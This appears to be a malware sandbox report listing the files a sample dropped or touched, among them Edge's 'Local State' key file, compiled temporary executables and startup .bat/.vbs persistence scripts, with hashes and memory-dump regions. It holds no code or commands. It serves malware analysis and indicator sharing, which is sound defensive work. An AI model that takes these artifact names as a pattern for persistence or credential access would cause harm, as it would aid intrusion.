d104832ff0cb57f0681a9da74927cc24616e014c24bb557fed3355e74cba4f68151eaecb1ede04b64cec0f85a6d0b768f107542f9cac9bfb8633c5c8ed62d19e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
a1043a1ae88bc37291993fa90d9b822b

SHA1
31f1addaa70fd22de4ce5747a703b7437b1813af

SHA256
d7b3a1d0ed9a8c2fe0aa7b6646c4fafda768663f173ce7b1fa3f81b91af1065f

SHA512
a37331636d8710407e686dd502b4f5a137abd76a6bb9d8131aa5059328add19587a319e509a6a9767d7777e64ea7cd34f1337719368be0d0a7543fb6ae127386

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d176525979886e6237f2c2c17890400f

SHA1
17185da3f72158397d97f0cd1303aba9a7d49945

SHA256
3a2b92252e2cadb318981d6be2c67467f4448e4fb638a51e549c4c4396559c85

SHA512
a484203bd76a8a5ca103d734261a65efef02c6d41b8144a37bad74a1a09e1e55a29e81605ca9ac8e67584fa8f7e4c17c41df68d3b7ce48468ad5c892cee066c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

Filesize
3B

MD5
854d217c25dc2a4e764b21a0b9386cf4

SHA1
43b7b6b243c471702d312183ef0dc6407f334644

SHA256
07f7ffaf6bf83c3957a83bad52e5ea24eb569b20c21d5fbecd797388be72cc6b

SHA512
7a20772c7261225b051ee09ca662592a055618eafbe9bd543e70185702c10e6d8c6f5bbca40b2015661eef85fef5c72d69fc9dae736a06bd0d6cb80cc92899b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
59d37a8c588c83e806678c7fb5d1229f

SHA1
4396d68567f30f08e08a269802fe3f4784b88c5b

SHA256
c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84

SHA512
19223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4397b0d1a82fec8a95f1ab53c152c5a5

SHA1
3632ed4f2b65fd0df29b3d3725e3a611d2e1adf7

SHA256
10cece13749ac090c815e53dc5e248b4b9c3ba93dc3d434d97d22f12a3906734

SHA512
f0d21ab75d08e1cb4ac83507f9ca41ef5365027b0d7e27747ded44b76fdb0346ca2d7499697802c5b67696e0c73716fcfab698825a143515151001690804d59f

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\8f8b9a97-da0f-4cb3-baaa-4426019ac4b5.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\4hwgxduy\4hwgxduy.0.vb

Filesize
847B

MD5
1e9bcb20a9fdec5da1d39b0dd3a31e99

SHA1
40689933669560f8484c34cc35f1cf51a6717d05

SHA256
945fd689e232fa04521cf8707c030795bb2f153bde3e6342f440a569a8bd10f9

SHA512
8fd74e5d1cdb937251296fc6c431b3ebe9873077b515960551b8eff5e843908b76e9a4828a81c890c855ff44b3a22668a932708113af7f24efd14383cdc06d5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\4hwgxduy\4hwgxduy.cmdline

Filesize
313B

MD5
cb022d3bb50fee49f0993a10a6731c06

SHA1
d288c0887ab94cc8db2a75fcee18adae5953ea36

SHA256
71ad5f45736e28e8607c7e5ae55542de29a74a05eaaaa0ff4135eed8b9169897

SHA512
dd902d6762ca6d3571cef428e65ab30aa190cc5d474a232a51dd2c3c3d1914785627c6d29613b37bcae8066d3da806370cb7312ef271d145b988660dfa9d0640

Download Submit
C:\Users\Admin\AppData\Local\Temp\4hwgxduy\4hwgxduy.exe

Filesize
7KB

MD5
9ee608086597a414cbd5a87b55aaf059

SHA1
439c717f8720fa1ee382145a18fa7e3d3ccf7fc4

SHA256
c84b7b929df5e73514b0df76d96d583f3370d408ea9133d88132cad1b73bd9a6

SHA512
e2d3720ef8e7f3a264fe935bfe8cad4ebb5caeb63afd05544e5bca391f24e54cd60dacdbd9232adb23c8f04b5cd67668fd3ddb7d0f477f0705631edc925265c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2AA5.tmp

Filesize
1KB

MD5
89e36b96d9a6c5ed8a6421324a26baec

SHA1
02176f3f89c1937ce1f726b4788e6d0d55530447

SHA256
e15eccbff1667045f4f0fe2a3e5f9c20842ad5a509895d4c07adf79633f864e5

SHA512
21a30938a86a169f8064919eda6bed0bd6d4f3c14f4fd0459c63062f2176e09a25819331338a064c912e41b819373f12b7afbb1cb53939b01efa636e755e9c48

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2AA6.tmp

Filesize
1KB

MD5
bfb49aca04a57978ab6e59962b5d90b9

SHA1
32a6198d87073ade19ee4f2dd77fde8a708c87c8

SHA256
c16644ff3ea1e366044d2b6be831948555fb784bab1ef47ee9f521a6054254f9

SHA512
0d4b1c38d6d2ed2a78477bfa73498531132ad6b1bfb502f57885f0e509da6a6ed8cfee2a67ec5f56e4fb8831df6967cdfe0bc1d06de0f2e4f1f6317f5de24e2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itqned5v.uop.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\unmk4e2g\unmk4e2g.cmdline

Filesize
313B

MD5
8ef2646b217c052412f8556f3739f345

SHA1
f6b9cdc3d6fc2dbb275d41f700300e48a19dd73c

SHA256
8133aaae6d0c05d7c41cf415f0c3ef18a5f2f39d5fbe69bfdf563e6a4b9c45c1

SHA512
810e494a4058063ba79438a56ea0bcf3b6bff8559b6a04bbb2cf23aa44aec13d74149062bc88f93b5c9bc3bc0769ee6102d7ebe1ca3361466a1e5f37bddce524

Download Submit
C:\Users\Admin\AppData\Local\Temp\unmk4e2g\unmk4e2g.exe

Filesize
7KB

MD5
191ee801d544547252aa8d282906710b

SHA1
7f683740546b91b5268bf2c432e12ef8d074da9a

SHA256
ebf19a2e4dd5500db5f92aa1a18c96602211c71c4a76d5b6b8ae69b3875facd4

SHA512
cc863f08b61437eb0def93724ac0e74c8a3a7a026533631744ba99542f06ed126ff9001dfe3a1d290b9a347f5c45e7fce968d22e40b9d5d17d9b00090c85b971

Download Submit
C:\Users\Admin\AppData\Local\Temp\vbcB502BC7CBD1744E38AD991F0EE7B7C3A.TMP

Filesize
1KB

MD5
771103c9b0107c35c2db6f2407e6e447

SHA1
daf058e96ef8494b3d037cd2c50b3fcc3066af76

SHA256
3da13603a461a28762a7b15cdb4e5560eca062d021f600dae7d786ed36f2ec6e

SHA512
806a2d9a1272c2f1d94c9388676d3065877142233203b9f34786d4c047ab9ccff652d91528e7d9c9805c4c49262b6e19d6bbd0f00c6ab9c56871ec53c5175fbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\vbcB987E5216FBA4368A727CAD4888CE14C.TMP

Filesize
1KB

MD5
bca095ac9fa16a0999ed38a9087e25ff

SHA1
50776a35b66c9c921430c9132c1156c3ab156442

SHA256
139c6d8f0d00d81ebfa663570d1fccd2cc68a76078ecd31afd5dad65216961c7

SHA512
29a3566989e7db3f0c79e85b194721b0ca581f87ff3e47ca7fffc50907c5961397c4ce1f03da6c5752c57adff4b752f3675547da6b979bbf174d71b8f9a24902

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_331.bat

Filesize
265KB

MD5
ea022218cf52320994c98e2f1b0e9f46

SHA1
b17198bf147cd1905d909faf1cc08dee5402884f

SHA256
fbc3a0a0fa908b5261b13f0cc740cca0d6cf7e298cdd1a0413b0e16944bc949f

SHA512
576a8e622e224f58f5ff790c0fe21c2d4fe7a61614c81e9d6bac0c9ac0faae5674204232f1527e7aade3d9f37dde28627a43da0fd1291b42c9744db76d1f98f3

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_331.vbs

Filesize
115B

MD5
7b50a89fc8314211d9d72b9b5dfe098f

SHA1
de42c848a4b847b236a165e3ed1088b129c5425d

SHA256
7acdd84cf047ef8897d43188f7555cfd918efc323384f3f7ac9b7fd9d944ba2d

SHA512
6680bb6af024bc002d1ce5f6aedbedff893087f5a1ed1d850ccb9a118f39d3f7c7a943f330b032fcdcbac41e20179aef28c755b74ccd9cf9332ad20e7bd84572

Download Submit
memory/232-12-0x00007FFF84F10000-0x00007FFF859D2000-memory.dmp

Filesize
10.8MB

Download
memory/232-73-0x00007FFF84F13000-0x00007FFF84F15000-memory.dmp

Filesize
8KB

Download
memory/232-0-0x00007FFF84F13000-0x00007FFF84F15000-memory.dmp

Filesize
8KB

Download
memory/232-13-0x000001AE2D220000-0x000001AE2D228000-memory.dmp

Filesize
32KB

Download
memory/232-14-0x000001AE2D240000-0x000001AE2D274000-memory.dmp

Filesize
208KB

Download
memory/232-11-0x00007FFF84F10000-0x00007FFF859D2000-memory.dmp

Filesize
10.8MB

Download
memory/232-74-0x00007FFF84F10000-0x00007FFF859D2000-memory.dmp

Filesize
10.8MB

Download
memory/232-9-0x000001AE2CFC0000-0x000001AE2CFE2000-memory.dmp

Filesize
136KB

Download
memory/232-10-0x00007FFF84F10000-0x00007FFF859D2000-memory.dmp

Filesize
10.8MB

Download
memory/4416-77-0x000002845D740000-0x000002845D74C000-memory.dmp

Filesize
48KB

Download
memory/4416-78-0x000002845EF10000-0x000002845F438000-memory.dmp

Filesize
5.2MB

Download
memory/4416-76-0x000002845D710000-0x000002845D71C000-memory.dmp

Filesize
48KB

Download
memory/4416-110-0x000002845DA50000-0x000002845DA58000-memory.dmp

Filesize
32KB

Download
memory/4416-79-0x0000028444A70000-0x0000028444A7A000-memory.dmp

Filesize
40KB

Download
memory/4416-112-0x000002845DA60000-0x000002845DA6C000-memory.dmp

Filesize
48KB

Download
memory/4416-107-0x000002845D370000-0x000002845D378000-memory.dmp

Filesize
32KB

Download
memory/4416-43-0x000002845CFE0000-0x000002845CFF0000-memory.dmp

Filesize
64KB

Download